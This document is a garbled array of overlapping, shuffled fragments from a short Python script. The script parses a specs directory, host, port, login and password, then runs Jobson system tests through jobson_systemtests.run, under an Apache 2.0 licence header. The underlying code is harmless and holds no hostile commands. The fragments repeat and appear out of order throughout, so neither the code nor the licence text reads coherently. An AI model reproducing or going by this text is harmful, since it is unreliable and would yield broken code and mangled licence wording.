[ "# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you", "writing, software # distributed under the License is distributed on an \"AS IS\"", "directory containing jobson specs (and tests)') parser.add_argument( 'host', type=str, help='The host running the", "type=str, help='The host running the server (e.g. localhost)') parser.add_argument( 'port', type=int, help='The port", "main(argv=None): if argv is None: argv = sys.argv parser = argparse.ArgumentParser(description='Run jobson system", "the API') parser.add_argument( 'password', type=str, help='The password to use the access the API')", "API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password) return 0 if", "KIND, either express or implied. # See the License for the specific language", "'specs_dir', type=str, help='Path to directory containing jobson specs (and tests)') parser.add_argument( 'host', type=str,", "Unless required by applicable law or agreed to in writing, software # distributed", "host running the server (e.g. localhost)') parser.add_argument( 'port', type=int, help='The port the Jobson", "You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "-*- # # Licensed under the Apache License, Version 2.0 (the \"License\"); #", "the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "# See the License for the specific language governing permissions and # limitations", "port the Jobson API is listening on (e.g. 8080)') parser.add_argument( 'login', type=str, help='The", "parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password) return 0 if __name__ == \"__main__\":", "License. # You may obtain a copy of the License at # #", "Jobson API is listening on (e.g. 8080)') parser.add_argument( 'login', type=str, help='The login to", "def main(argv=None): if argv is None: argv = sys.argv parser = argparse.ArgumentParser(description='Run jobson", "help='Path to directory containing jobson specs (and tests)') parser.add_argument( 'host', type=str, help='The host", "governing permissions and # limitations under the License. # import argparse import sys", "law or agreed to in writing, software # distributed under the License is", "tests)') parser.add_argument( 'host', type=str, help='The host running the server (e.g. localhost)') parser.add_argument( 'port',", "type=str, help='The login to use to access the API') parser.add_argument( 'password', type=str, help='The", "the License for the specific language governing permissions and # limitations under the", "compliance with the License. # You may obtain a copy of the License", "specs (and tests)') parser.add_argument( 'host', type=str, help='The host running the server (e.g. localhost)')", "parser.add_argument( 'port', type=int, help='The port the Jobson API is listening on (e.g. 8080)')", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "this file except in compliance with the License. # You may obtain a", "API is listening on (e.g. 8080)') parser.add_argument( 'login', type=str, help='The login to use", "the Apache License, Version 2.0 (the \"License\"); # you may not use this", "jobson system tests') parser.add_argument( 'specs_dir', type=str, help='Path to directory containing jobson specs (and", "you may not use this file except in compliance with the License. 
#", "access the API') parser.add_argument( 'password', type=str, help='The password to use the access the", "help='The port the Jobson API is listening on (e.g. 8080)') parser.add_argument( 'login', type=str,", "on (e.g. 8080)') parser.add_argument( 'login', type=str, help='The login to use to access the", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "None: argv = sys.argv parser = argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir', type=str,", "parser.add_argument( 'host', type=str, help='The host running the server (e.g. localhost)') parser.add_argument( 'port', type=int,", "to use to access the API') parser.add_argument( 'password', type=str, help='The password to use", "the server (e.g. localhost)') parser.add_argument( 'port', type=int, help='The port the Jobson API is", "8080)') parser.add_argument( 'login', type=str, help='The login to use to access the API') parser.add_argument(", "password to use the access the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host,", "ANY KIND, either express or implied. # See the License for the specific", "is listening on (e.g. 8080)') parser.add_argument( 'login', type=str, help='The login to use to", "in compliance with the License. # You may obtain a copy of the", "tests') parser.add_argument( 'specs_dir', type=str, help='Path to directory containing jobson specs (and tests)') parser.add_argument(", "use to access the API') parser.add_argument( 'password', type=str, help='The password to use the", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "parser = argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir', type=str, help='Path to directory containing", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #", "use this file except in compliance with the License. # You may obtain", "and # limitations under the License. # import argparse import sys import jobson_systemtests", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "(e.g. 8080)') parser.add_argument( 'login', type=str, help='The login to use to access the API')", "not use this file except in compliance with the License. # You may", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See", "listening on (e.g. 8080)') parser.add_argument( 'login', type=str, help='The login to use to access", "the Jobson API is listening on (e.g. 8080)') parser.add_argument( 'login', type=str, help='The login", "use the access the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login,", "See the License for the specific language governing permissions and # limitations under", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "License, Version 2.0 (the \"License\"); # you may not use this file except", "login to use to access the API') parser.add_argument( 'password', type=str, help='The password to", "# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may", "'password', type=str, help='The password to use the access the API') args = parser.parse_args(argv[1:])", "permissions and # limitations under the License. 
# import argparse import sys import", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "python3 # -*- coding: utf-8 -*- # # Licensed under the Apache License,", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in", "argv is None: argv = sys.argv parser = argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument(", "to directory containing jobson specs (and tests)') parser.add_argument( 'host', type=str, help='The host running", "OF ANY KIND, either express or implied. # See the License for the", "jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password) return 0 if __name__ == \"__main__\": sys.exit(main())", "2.0 (the \"License\"); # you may not use this file except in compliance", "specific language governing permissions and # limitations under the License. # import argparse", "server (e.g. localhost)') parser.add_argument( 'port', type=int, help='The port the Jobson API is listening", "'host', type=str, help='The host running the server (e.g. localhost)') parser.add_argument( 'port', type=int, help='The", "# you may not use this file except in compliance with the License.", "access the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password) return", "argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir', type=str, help='Path to directory containing jobson specs", "for the specific language governing permissions and # limitations under the License. #", "agreed to in writing, software # distributed under the License is distributed on", "(and tests)') parser.add_argument( 'host', type=str, help='The host running the server (e.g. localhost)') parser.add_argument(", "language governing permissions and # limitations under the License. # import argparse import", "the specific language governing permissions and # limitations under the License. # import", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the", "if argv is None: argv = sys.argv parser = argparse.ArgumentParser(description='Run jobson system tests')", "limitations under the License. # import argparse import sys import jobson_systemtests def main(argv=None):", "jobson_systemtests def main(argv=None): if argv is None: argv = sys.argv parser = argparse.ArgumentParser(description='Run", "coding: utf-8 -*- # # Licensed under the Apache License, Version 2.0 (the", "(the \"License\"); # you may not use this file except in compliance with", "argparse import sys import jobson_systemtests def main(argv=None): if argv is None: argv =", "type=int, help='The port the Jobson API is listening on (e.g. 8080)') parser.add_argument( 'login',", "argv = sys.argv parser = argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir', type=str, help='Path", "# # Unless required by applicable law or agreed to in writing, software", "express or implied. # See the License for the specific language governing permissions", "Version 2.0 (the \"License\"); # you may not use this file except in", "# Unless required by applicable law or agreed to in writing, software #", "except in compliance with the License. 
# You may obtain a copy of", "by applicable law or agreed to in writing, software # distributed under the", "type=str, help='The password to use the access the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run(", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "either express or implied. # See the License for the specific language governing", "jobson specs (and tests)') parser.add_argument( 'host', type=str, help='The host running the server (e.g.", "# limitations under the License. # import argparse import sys import jobson_systemtests def", "License. # import argparse import sys import jobson_systemtests def main(argv=None): if argv is", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", "help='The password to use the access the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir,", "parser.add_argument( 'specs_dir', type=str, help='Path to directory containing jobson specs (and tests)') parser.add_argument( 'host',", "# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "may not use this file except in compliance with the License. # You", "License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to", "file except in compliance with the License. # You may obtain a copy", "= parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password) return 0 if __name__ ==", "#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # Licensed under the Apache", "import jobson_systemtests def main(argv=None): if argv is None: argv = sys.argv parser =", "containing jobson specs (and tests)') parser.add_argument( 'host', type=str, help='The host running the server", "under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "License for the specific language governing permissions and # limitations under the License.", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "import sys import jobson_systemtests def main(argv=None): if argv is None: argv = sys.argv", "parser.add_argument( 'login', type=str, help='The login to use to access the API') parser.add_argument( 'password',", "the License. # You may obtain a copy of the License at #", "to in writing, software # distributed under the License is distributed on an", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "-*- coding: utf-8 -*- # # Licensed under the Apache License, Version 2.0", "the License. # import argparse import sys import jobson_systemtests def main(argv=None): if argv", "'port', type=int, help='The port the Jobson API is listening on (e.g. 8080)') parser.add_argument(", "parser.add_argument( 'password', type=str, help='The password to use the access the API') args =", "# distributed under the License is distributed on an \"AS IS\" BASIS, #", "the access the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password)", "implied. 
# See the License for the specific language governing permissions and #", "'login', type=str, help='The login to use to access the API') parser.add_argument( 'password', type=str,", "sys import jobson_systemtests def main(argv=None): if argv is None: argv = sys.argv parser", "\"License\"); # you may not use this file except in compliance with the", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "required by applicable law or agreed to in writing, software # distributed under", "args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password) return 0 if __name__", "import argparse import sys import jobson_systemtests def main(argv=None): if argv is None: argv", "system tests') parser.add_argument( 'specs_dir', type=str, help='Path to directory containing jobson specs (and tests)')", "applicable law or agreed to in writing, software # distributed under the License", "help='The login to use to access the API') parser.add_argument( 'password', type=str, help='The password", "API') parser.add_argument( 'password', type=str, help='The password to use the access the API') args", "running the server (e.g. localhost)') parser.add_argument( 'port', type=int, help='The port the Jobson API", "or agreed to in writing, software # distributed under the License is distributed", "help='The host running the server (e.g. localhost)') parser.add_argument( 'port', type=int, help='The port the", "or implied. # See the License for the specific language governing permissions and", "# import argparse import sys import jobson_systemtests def main(argv=None): if argv is None:", "= sys.argv parser = argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir', type=str, help='Path to", "type=str, help='Path to directory containing jobson specs (and tests)') parser.add_argument( 'host', type=str, help='The", "localhost)') parser.add_argument( 'port', type=int, help='The port the Jobson API is listening on (e.g.", "the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password) return 0", "distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT", "CONDITIONS OF ANY KIND, either express or implied. # See the License for", "Apache License, Version 2.0 (the \"License\"); # you may not use this file", "OR CONDITIONS OF ANY KIND, either express or implied. # See the License", "may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "= argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir', type=str, help='Path to directory containing jobson", "utf-8 -*- # # Licensed under the Apache License, Version 2.0 (the \"License\");", "to access the API') parser.add_argument( 'password', type=str, help='The password to use the access", "is None: argv = sys.argv parser = argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir',", "with the License. # You may obtain a copy of the License at", "(e.g. localhost)') parser.add_argument( 'port', type=int, help='The port the Jobson API is listening on", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,", "under the License. 
# import argparse import sys import jobson_systemtests def main(argv=None): if", "in writing, software # distributed under the License is distributed on an \"AS", "# -*- coding: utf-8 -*- # # Licensed under the Apache License, Version", "sys.argv parser = argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir', type=str, help='Path to directory", "under the Apache License, Version 2.0 (the \"License\"); # you may not use", "to use the access the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port," ]
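# A minimal sketch of driving main() programmatically rather than from a
# shell; the script name, path and credentials below are hypothetical
# placeholders, not values from the original project.
demo_argv = [
    'run_systemtests.py',  # argv[0] is skipped by parse_args(argv[1:])
    '/path/to/specs',      # specs_dir
    'localhost',           # host
    '8080',                # port (argparse converts it to int)
    'admin',               # login
    'secret',              # password
]
exit_code = main(demo_argv)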
[ "<filename>conventions/migrations/0008_auto_20210831_1707.py # Generated by Django 3.2.5 on 2021-08-31 15:07 from django.db import migrations,", "15:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"),", "= [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ), migrations.AlterField( model_name=\"convention\", name=\"numero\", field=models.CharField(max_length=255, null=True), ),", "by Django 3.2.5 on 2021-08-31 15:07 from django.db import migrations, models class Migration(migrations.Migration):", "2021-08-31 15:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"conventions\",", "(\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ), migrations.AlterField( model_name=\"convention\",", "Django 3.2.5 on 2021-08-31 15:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies", "class Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField( model_name=\"convention\",", "dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True),", "3.2.5 on 2021-08-31 15:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\",", "] operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ), migrations.AlterField( model_name=\"convention\", name=\"numero\", field=models.CharField(max_length=255,", "models class Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField(", "= [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ),", "Generated by Django 3.2.5 on 2021-08-31 15:07 from django.db import migrations, models class", "[ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ), migrations.AlterField( model_name=\"convention\", name=\"numero\", field=models.CharField(max_length=255, null=True), ), ]", "import migrations, models class Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations =", "[ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ), migrations.AlterField(", "# Generated by Django 3.2.5 on 2021-08-31 15:07 from django.db import migrations, models", "\"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ), migrations.AlterField( model_name=\"convention\", name=\"numero\",", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ]", "on 
2021-08-31 15:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations", "operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ), migrations.AlterField( model_name=\"convention\", name=\"numero\", field=models.CharField(max_length=255, null=True),", "migrations, models class Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [" ]
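# For context, a minimal sketch of the Convention model state implied by the
# operations above; the two field definitions come straight from the
# migration, while the app's other fields and Meta options are assumed.
from django.db import models


class Convention(models.Model):
    numero = models.CharField(max_length=255, null=True)  # AlterField target
    fond_propre = models.FloatField(null=True)            # AddField target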
[ "length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution", "s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution *** ## Approach 1", ">>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution *** ## Approach", "'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution *** ##", "['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution ***", "s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\" f\"\\n The Repeated subSequence is:", "`G`, `T`的核苷酸组成, 例如: `ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s =", "# Solution *** ## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def", "subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string: {s2}\" f\"\\n The Repeated subSequence", "is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string: {s2}\" f\"\\n The Repeated subSequence is:", "output = set() # iterate over all sequences of length for start in", "并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n = len(sequence) seen = set() output", "简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n = len(sequence) seen", "+ length] if tmp in seen: output.add(tmp[:]) seen.add(tmp) return list(output) if __name__ ==", "__name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA string:", "例如: `ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>>", "Solution *** ## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence,", "in range(n - length + 1): tmp = sequence[start:start + length] if tmp", "seen.add(tmp) return list(output) if __name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA'", "*** ## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length):", "'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution *** ## Approach 1 简单固定长度滑动窗口, 长度为L,", "DNA string: {s1}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA", "f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string: {s2}\" f\"\\n", "**test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s", "找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC',", "return list(output) if __name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For", "start in range(n - length + 1): tmp = sequence[start:start + length] if", "input DNA string: {s1}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input", "findRepeatedDnaSequence(sequence, 
length): n = len(sequence) seen = set() output = set() # iterate", "if tmp in seen: output.add(tmp[:]) seen.add(tmp) return list(output) if __name__ == '__main__': s1", "length + 1): tmp = sequence[start:start + length] if tmp in seen: output.add(tmp[:])", "= sequence[start:start + length] if tmp in seen: output.add(tmp[:]) seen.add(tmp) return list(output) if", ">>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA']", "sequence[start:start + length] if tmp in seen: output.add(tmp[:]) seen.add(tmp) return list(output) if __name__", "中出现次数超过一次 **test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>>", "= \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s,", "# iterate over all sequences of length for start in range(n - length", "tmp in seen: output.add(tmp[:]) seen.add(tmp) return list(output) if __name__ == '__main__': s1 =", "`ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s,", "findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution *** ## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(),", "s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>>", "长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n = len(sequence) seen =", "1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n = len(sequence)", "length=10)}\") print(f\"For input DNA string: {s2}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s2, length=10)}\")", "tmp = sequence[start:start + length] if tmp in seen: output.add(tmp[:]) seen.add(tmp) return list(output)", "list(output) if __name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input", "length] if tmp in seen: output.add(tmp[:]) seen.add(tmp) return list(output) if __name__ == '__main__':", "seen: output.add(tmp[:]) seen.add(tmp) return list(output) if __name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2", "set() output = set() # iterate over all sequences of length for start", "<gh_stars>0 \"\"\" 所有的DNA都是由一系列缩写为`A`, `C`, `G`, `T`的核苷酸组成, 例如: `ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test", "Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n =", "string: {s1}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string:", "over all sequences of length for start in range(n - length + 1):", "{s1}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string: {s2}\"", "且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA']", "seen = set() output = set() # iterate over all sequences of length", "\"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> 
findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10)", "for start in range(n - length + 1): tmp = sequence[start:start + length]", "all sequences of length for start in range(n - length + 1): tmp", "`T`的核苷酸组成, 例如: `ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\"", "## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n", "set() # iterate over all sequences of length for start in range(n -", "编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10)", "一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n = len(sequence) seen = set() output =", "length=10) ['AAAAAAAAAA'] # Solution *** ## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出", "{findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string: {s2}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s2,", ">>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA'", "= 'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1,", "length for start in range(n - length + 1): tmp = sequence[start:start +", "+ 1): tmp = sequence[start:start + length] if tmp in seen: output.add(tmp[:]) seen.add(tmp)", "def findRepeatedDnaSequence(sequence, length): n = len(sequence) seen = set() output = set() #", "'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\" f\"\\n The Repeated subSequence", "The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string: {s2}\" f\"\\n The", "Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string: {s2}\" f\"\\n The Repeated", "case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s =", "= set() # iterate over all sequences of length for start in range(n", "1): tmp = sequence[start:start + length] if tmp in seen: output.add(tmp[:]) seen.add(tmp) return", ">>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution *** ## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。", "`C`, `G`, `T`的核苷酸组成, 例如: `ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s", "range(n - length + 1): tmp = sequence[start:start + length] if tmp in", "output.add(tmp[:]) seen.add(tmp) return list(output) if __name__ == '__main__': s1 = 